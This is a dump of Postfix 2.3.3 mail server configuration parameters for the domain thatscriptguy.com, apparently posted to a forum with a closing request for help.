berkeley_db_create_buffer_size = 16777216
berkeley_db_read_buffer_size = 131072
best_mx_transport =
biff = yes
body_checks =
body_checks_size_limit = 51200
bounce_notice_recipient = postmaster
bounce_queue_lifetime = 5d
bounce_service_name = bounce
bounce_size_limit = 50000
bounce_template_file =
broken_sasl_auth_clients = yes
canonical_classes = envelope_sender, envelope_recipient, header_sender, header_recipient
canonical_maps = hash:/etc/postfix/canonical
cleanup_service_name = cleanup
command_directory = /usr/sbin
command_execution_directory =
command_expansion_filter = 1234567890!@%-_=+:,./abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
command_time_limit = 1000s
config_directory = /etc/postfix
connection_cache_protocol_timeout = 5s
connection_cache_service_name = scache
connection_cache_status_update_time = 600s
connection_cache_ttl_limit = 2s
content_filter =
daemon_directory = /usr/libexec/postfix
daemon_timeout = 18000s
debug_peer_level = 2
debug_peer_list =
default_database_type = hash
default_delivery_slot_cost = 5
default_delivery_slot_discount = 50
default_delivery_slot_loan = 3
default_destination_concurrency_limit = 20
default_destination_recipient_limit = 50
default_extra_recipient_limit = 1000
default_minimum_delivery_slots = 3
default_privs = nobody
default_process_limit = 100
default_rbl_reply = $rbl_code Service unavailable; $rbl_class [$rbl_what] blocked using $rbl_domain${rbl_reason?; $rbl_reason}
default_recipient_limit = 10000
default_transport = smtp
default_verp_delimiters = +=
defer_code = 450
defer_service_name = defer
defer_transports =
delay_logging_resolution_limit = 2
delay_notice_recipient = postmaster
delay_warning_time = 0h
deliver_lock_attempts = 20
deliver_lock_delay = 1s
disable_dns_lookups = no
disable_mime_input_processing = no
disable_mime_output_conversion = no
disable_verp_bounces = no
disable_vrfy_command = no
dont_remove = 0
double_bounce_sender = double-bounce
duplicate_filter_limit = 1000
empty_address_recipient = MAILER-DAEMON
enable_original_recipient = yes
error_notice_recipient = postmaster
error_service_name = error
execution_directory_expansion_filter = 1234567890!@%-_=+:,./abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
expand_owner_alias = no
export_environment = TZ MAIL_CONFIG LANG
fallback_transport =
fallback_transport_maps =
fast_flush_domains = $relay_domains
fast_flush_purge_time = 7d
fast_flush_refresh_time = 12h
fault_injection_code = 0
flush_service_name = flush
fork_attempts = 5
fork_delay = 1s
forward_expansion_filter = 1234567890!@%-_=+:,./abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
forward_path = $home/.forward${recipient_delimiter}${extension}, $home/.forward
frozen_delivered_to = yes
hash_queue_depth = 1
hash_queue_names = deferred, defer
header_address_token_limit = 10240
header_checks =
header_size_limit = 102400
helpful_warnings = yes
home_mailbox =
hopcount_limit = 50
html_directory = no
ignore_mx_lookup_error = no
import_environment = MAIL_CONFIG MAIL_DEBUG MAIL_LOGTAG TZ XAUTHORITY DISPLAY LANG=C
in_flow_delay = 1s
inet_interfaces = all
inet_protocols = ipv4
initial_destination_concurrency = 5
internal_mail_filter_classes =
invalid_hostname_reject_code = 501
ipc_idle = 100s
ipc_timeout = 3600s
ipc_ttl = 1000s
line_length_limit = 2048
lmtp_bind_address =
lmtp_bind_address6 =
lmtp_cname_overrides_servername = no
lmtp_connect_timeout = 0s
lmtp_connection_cache_destinations =
lmtp_connection_cache_on_demand = yes
lmtp_connection_cache_time_limit = 2s
lmtp_connection_reuse_time_limit = 300s
lmtp_data_done_timeout = 600s
lmtp_data_init_timeout = 120s
lmtp_data_xfer_timeout = 180s
lmtp_defer_if_no_mx_address_found = no
lmtp_destination_concurrency_limit = $default_destination_concurrency_limit
lmtp_destination_recipient_limit = $default_destination_recipient_limit
lmtp_discard_lhlo_keyword_address_maps =
lmtp_discard_lhlo_keywords =
lmtp_enforce_tls = no
lmtp_generic_maps =
lmtp_host_lookup = dns
lmtp_lhlo_name = $myhostname
lmtp_lhlo_timeout = 300s
lmtp_line_length_limit = 990
lmtp_mail_timeout = 300s
lmtp_mx_address_limit = 5
lmtp_mx_session_limit = 2
lmtp_pix_workaround_delay_time = 10s
lmtp_pix_workaround_threshold_time = 500s
lmtp_quit_timeout = 300s
lmtp_quote_rfc821_envelope = yes
lmtp_randomize_addresses = yes
lmtp_rcpt_timeout = 300s
lmtp_rset_timeout = 20s
lmtp_sasl_auth_enable = no
lmtp_sasl_mechanism_filter =
lmtp_sasl_password_maps =
lmtp_sasl_path =
lmtp_sasl_security_options = noplaintext, noanonymous
lmtp_sasl_tls_security_options = $lmtp_sasl_security_options
lmtp_sasl_tls_verified_security_options = $lmtp_sasl_tls_security_options
lmtp_sasl_type = cyrus
lmtp_send_xforward_command = no
lmtp_sender_dependent_authentication = no
lmtp_skip_5xx_greeting = yes
lmtp_starttls_timeout = 300s
lmtp_tcp_port = 24
lmtp_tls_CAfile =
lmtp_tls_CApath =
lmtp_tls_cert_file =
lmtp_tls_dcert_file =
lmtp_tls_dkey_file = $lmtp_tls_dcert_file
lmtp_tls_enforce_peername = yes
lmtp_tls_exclude_ciphers =
lmtp_tls_key_file = $lmtp_tls_cert_file
lmtp_tls_loglevel = 0
lmtp_tls_mandatory_ciphers = medium
lmtp_tls_mandatory_exclude_ciphers =
lmtp_tls_mandatory_protocols = SSLv3, TLSv1
lmtp_tls_note_starttls_offer = no
lmtp_tls_per_site =
lmtp_tls_policy_maps =
lmtp_tls_scert_verifydepth = 5
lmtp_tls_secure_cert_match = nexthop
lmtp_tls_security_level =
lmtp_tls_session_cache_database =
lmtp_tls_session_cache_timeout = 3600s
lmtp_tls_verify_cert_match = hostname
lmtp_use_tls = no
lmtp_xforward_timeout = 300s
local_command_shell =
local_destination_concurrency_limit = 2
local_destination_recipient_limit = 1
local_header_rewrite_clients = permit_inet_interfaces
local_recipient_maps = proxy:unix:passwd.byname $alias_maps
local_transport = local:$myhostname
luser_relay =
mail_name = Postfix
mail_owner = postfix
mail_release_date = 200600825
mail_spool_directory = /var/mail
mail_version = 2.3.3
mailbox_command =
mailbox_command_maps =
mailbox_delivery_lock = fcntl, dotlock
mailbox_size_limit = 51200000
mailbox_transport =
mailbox_transport_maps =
mailq_path = /usr/bin/mailq.postfix
manpage_directory = /usr/share/man
maps_rbl_domains =
maps_rbl_reject_code = 554
masquerade_classes = envelope_sender, header_sender, header_recipient
masquerade_domains =
masquerade_exceptions =
max_idle = 100s
max_use = 100
maximal_backoff_time = 4000s
maximal_queue_lifetime = 5d
message_reject_characters =
message_size_limit = 10240000
message_strip_characters =
milter_command_timeout = 30s
milter_connect_macros = j {daemon_name} v
milter_connect_timeout = 30s
milter_content_timeout = 300s
milter_data_macros = i
milter_default_action = tempfail
milter_end_of_data_macros = i
milter_helo_macros = {tls_version} {cipher} {cipher_bits} {cert_subject} {cert_issuer}
milter_macro_daemon_name = $myhostname
milter_macro_v = $mail_name $mail_version
milter_mail_macros = i {auth_type} {auth_authen} {auth_author} {mail_addr}
milter_protocol = 2
milter_rcpt_macros = i {rcpt_addr}
milter_unknown_command_macros =
mime_boundary_length_limit = 2048
mime_header_checks = $header_checks
mime_nesting_limit = 100
minimal_backoff_time = 1000s
multi_recipient_bounce_reject_code = 550
mydestination = localhost.$mydomain, localhost, $mydomain, $myhostname
mydomain = thatscriptguy.com
myhostname = thatscriptguy.com
mynetworks = 127.0.0.0/8 66.90.121.0/24
mynetworks_style = subnet
myorigin = $myhostname
nested_header_checks = $header_checks
newaliases_path = /usr/bin/newaliases.postfix
non_fqdn_reject_code = 504
non_smtpd_milters =
notify_classes = resource, software
owner_request_special = yes
parent_domain_matches_subdomains = debug_peer_list,fast_flush_domains,mynetworks,permit_mx_backup_networks,qmqpd_authorized_clients,relay_domains,smtpd_access_maps
permit_mx_backup_networks =
pickup_service_name = pickup
plaintext_reject_code = 450
prepend_delivered_header = command, file, forward
process_id_directory = pid
propagate_unmatched_extensions = canonical, virtual
proxy_interfaces =
proxy_read_maps = $local_recipient_maps $mydestination $virtual_alias_maps $virtual_alias_domains $virtual_mailbox_maps $virtual_mailbox_domains $relay_recipient_maps $relay_domains $canonical_maps $sender_canonical_maps $recipient_canonical_maps $relocated_maps $transport_maps $mynetworks
qmgr_clog_warn_time = 300s
qmgr_fudge_factor = 100
qmgr_message_active_limit = 20000
qmgr_message_recipient_limit = 20000
qmgr_message_recipient_minimum = 10
qmqpd_authorized_clients =
qmqpd_error_delay = 1s
qmqpd_timeout = 300s
queue_directory = /var/spool/postfix
queue_file_attribute_count_limit = 100
queue_minfree = 0
queue_run_delay = 1000s
queue_service_name = qmgr
rbl_reply_maps =
readme_directory = /usr/share/doc/postfix-2.3.3/README_FILES
receive_override_options =
recipient_bcc_maps =
recipient_canonical_classes = envelope_recipient, header_recipient
recipient_canonical_maps =
recipient_delimiter =
reject_code = 554
relay_clientcerts =
relay_destination_concurrency_limit = $default_destination_concurrency_limit
relay_destination_recipient_limit = $default_destination_recipient_limit
relay_domains = $mydestination
relay_domains_reject_code = 554
relay_recipient_maps =
relay_transport = relay
relayhost =
relocated_maps =
remote_header_rewrite_domain =
require_home_directory = no
resolve_dequoted_address = yes
resolve_null_domain = no
resolve_numeric_domain = no
rewrite_service_name = rewrite
sample_directory = /usr/share/doc/postfix-2.3.3/samples
sender_bcc_maps =
sender_canonical_classes = envelope_sender, header_sender
sender_canonical_maps = hash:/etc/postfix/canonical
sender_dependent_relayhost_maps =
sendmail_path = /usr/sbin/sendmail.postfix
service_throttle_time = 60s
setgid_group = postdrop
show_user_unknown_table_name = yes
showq_service_name = showq
smtp_always_send_ehlo = yes
smtp_bind_address =
smtp_bind_address6 =
smtp_cname_overrides_servername = no
smtp_connect_timeout = 30s
smtp_connection_cache_destinations =
smtp_connection_cache_on_demand = yes
smtp_connection_cache_time_limit = 2s
smtp_connection_reuse_time_limit = 300s
smtp_data_done_timeout = 600s
smtp_data_init_timeout = 120s
smtp_data_xfer_timeout = 180s
smtp_defer_if_no_mx_address_found = no
smtp_destination_concurrency_limit = $default_destination_concurrency_limit
smtp_destination_recipient_limit = $default_destination_recipient_limit
smtp_discard_ehlo_keyword_address_maps =
smtp_discard_ehlo_keywords =
smtp_enforce_tls = no
smtp_fallback_relay = $fallback_relay
smtp_generic_maps =
smtp_helo_name = $myhostname
smtp_helo_timeout = 300s
smtp_host_lookup = dns
smtp_line_length_limit = 990
smtp_mail_timeout = 300s
smtp_mx_address_limit = 5
smtp_mx_session_limit = 2
smtp_never_send_ehlo = no
smtp_pix_workaround_delay_time = 10s
smtp_pix_workaround_threshold_time = 500s
smtp_quit_timeout = 300s
smtp_quote_rfc821_envelope = yes
smtp_randomize_addresses = yes
smtp_rcpt_timeout = 300s
smtp_rset_timeout = 20s
smtp_sasl_auth_enable = no
smtp_sasl_mechanism_filter =
smtp_sasl_password_maps =
smtp_sasl_path =
smtp_sasl_security_options = noplaintext, noanonymous
smtp_sasl_tls_security_options = $smtp_sasl_security_options
smtp_sasl_tls_verified_security_options = $smtp_sasl_tls_security_options
smtp_sasl_type = cyrus
smtp_send_xforward_command = no
smtp_sender_dependent_authentication = no
smtp_skip_5xx_greeting = yes
smtp_skip_quit_response = yes
smtp_starttls_timeout = 300s
smtp_tls_CAfile =
smtp_tls_CApath =
smtp_tls_cert_file =
smtp_tls_dcert_file =
smtp_tls_dkey_file = $smtp_tls_dcert_file
smtp_tls_enforce_peername = yes
smtp_tls_exclude_ciphers =
smtp_tls_key_file = $smtp_tls_cert_file
smtp_tls_loglevel = 0
smtp_tls_mandatory_ciphers = medium
smtp_tls_mandatory_exclude_ciphers =
smtp_tls_mandatory_protocols = SSLv3, TLSv1
smtp_tls_note_starttls_offer = no
smtp_tls_per_site =
smtp_tls_policy_maps =
smtp_tls_scert_verifydepth = 5
smtp_tls_secure_cert_match = nexthop, dot-nexthop
smtp_tls_security_level =
smtp_tls_session_cache_database =
smtp_tls_session_cache_timeout = 3600s
smtp_tls_verify_cert_match = hostname
smtp_use_tls = no
smtp_xforward_timeout = 300s
smtpd_authorized_verp_clients = $authorized_verp_clients
smtpd_authorized_xclient_hosts =
smtpd_authorized_xforward_hosts =
smtpd_banner = $myhostname ESMTP $mail_name
smtpd_client_connection_count_limit = 50
smtpd_client_connection_rate_limit = 0
smtpd_client_event_limit_exceptions = ${smtpd_client_connection_limit_exceptions:$mynetworks}
smtpd_client_message_rate_limit = 0
smtpd_client_new_tls_session_rate_limit = 0
smtpd_client_recipient_rate_limit = 0
smtpd_client_restrictions =
smtpd_data_restrictions =
smtpd_delay_open_until_valid_rcpt = yes
smtpd_delay_reject = yes
smtpd_discard_ehlo_keyword_address_maps =
smtpd_discard_ehlo_keywords =
smtpd_end_of_data_restrictions =
smtpd_enforce_tls = no
smtpd_error_sleep_time = 1s
smtpd_etrn_restrictions =
smtpd_expansion_filter = 40!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[]^_`abcdefghijklmnopqrstuvwxyz{|}~
smtpd_forbidden_commands = CONNECT GET POST
smtpd_hard_error_limit = 20
smtpd_helo_required = no
smtpd_helo_restrictions =
smtpd_history_flush_threshold = 100
smtpd_junk_command_limit = 100
smtpd_milters =
smtpd_noop_commands =
smtpd_null_access_lookup_key = <>
smtpd_peername_lookup = yes
smtpd_policy_service_max_idle = 300s
smtpd_policy_service_max_ttl = 1000s
smtpd_policy_service_timeout = 100s
smtpd_proxy_ehlo = $myhostname
smtpd_proxy_filter =
smtpd_proxy_timeout = 100s
smtpd_recipient_limit = 1000
smtpd_recipient_overshoot_limit = 1000
smtpd_recipient_restrictions = permit_mynetworks permit_sasl_authenticated reject_unauth_destination
smtpd_reject_unlisted_recipient = yes
smtpd_reject_unlisted_sender = no
smtpd_restriction_classes =
smtpd_sasl_auth_enable = yes
smtpd_sasl_authenticated_header = no
smtpd_sasl_exceptions_networks =
smtpd_sasl_local_domain =
smtpd_sasl_path = smtpd
smtpd_sasl_security_options = noanonymous
smtpd_sasl_tls_security_options = $smtpd_sasl_security_options
smtpd_sasl_type = cyrus
smtpd_sender_login_maps =
smtpd_sender_restrictions =
smtpd_soft_error_limit = 10
smtpd_starttls_timeout = 300s
smtpd_timeout = 300s
smtpd_tls_CAfile =
smtpd_tls_CApath =
smtpd_tls_always_issue_session_ids = yes
smtpd_tls_ask_ccert = no
smtpd_tls_auth_only = no
smtpd_tls_ccert_verifydepth = 5
smtpd_tls_cert_file =
smtpd_tls_dcert_file =
smtpd_tls_dh1024_param_file =
smtpd_tls_dh512_param_file =
smtpd_tls_dkey_file = $smtpd_tls_dcert_file
smtpd_tls_exclude_ciphers =
smtpd_tls_key_file = $smtpd_tls_cert_file
smtpd_tls_loglevel = 0
smtpd_tls_mandatory_ciphers = medium
smtpd_tls_mandatory_exclude_ciphers =
smtpd_tls_mandatory_protocols = SSLv3, TLSv1
smtpd_tls_received_header = no
smtpd_tls_req_ccert = no
smtpd_tls_security_level =
smtpd_tls_session_cache_database =
smtpd_tls_session_cache_timeout = 3600s
smtpd_tls_wrappermode = no
smtpd_use_tls = no
soft_bounce = no
stale_lock_time = 500s
strict_7bit_headers = no
strict_8bitmime = no
strict_8bitmime_body = no
strict_mime_encoding_domain = no
strict_rfc821_envelopes = no
sun_mailtool_compatibility = no
swap_bangpath = yes
syslog_facility = mail
syslog_name = postfix
tls_daemon_random_bytes = 32
tls_export_cipherlist = ALL:+RC4:@STRENGTH
tls_high_cipherlist = !EXPORT:!LOW:!MEDIUM:ALL:+RC4:@STRENGTH
tls_low_cipherlist = !EXPORT:ALL:+RC4:@STRENGTH
tls_medium_cipherlist = !EXPORT:!LOW:ALL:+RC4:@STRENGTH
tls_null_cipherlist = !aNULL:eNULL+kRSA
tls_random_bytes = 32
tls_random_exchange_name = ${config_directory}/prng_exch
tls_random_prng_update_period = 3600s
tls_random_reseed_period = 3600s
tls_random_source = dev:/dev/urandom
trace_service_name = trace
transport_maps =
transport_retry_time = 60s
trigger_timeout = 10s
undisclosed_recipients_header = To: undisclosed-recipients:;
unknown_address_reject_code = 450
unknown_client_reject_code = 450
unknown_hostname_reject_code = 450
unknown_local_recipient_reject_code = 550
unknown_relay_recipient_reject_code = 550
unknown_virtual_alias_reject_code = 550
unknown_virtual_mailbox_reject_code = 550
unverified_recipient_reject_code = 450
unverified_sender_reject_code = 450
verp_delimiter_filter = -=+
virtual_alias_domains = $virtual_alias_maps
virtual_alias_expansion_limit = 1000
virtual_alias_maps = hash:/etc/postfix/virtual
virtual_alias_recursion_limit = 1000
virtual_destination_concurrency_limit = $default_destination_concurrency_limit
virtual_destination_recipient_limit = $default_destination_recipient_limit
virtual_gid_maps =
virtual_mailbox_base =
virtual_mailbox_domains = $virtual_mailbox_maps
virtual_mailbox_limit = 51200000
virtual_mailbox_lock = fcntl
virtual_mailbox_maps =
virtual_minimum_uid = 100
virtual_transport = virtual
virtual_uid_maps =
Any help is very much appreciated.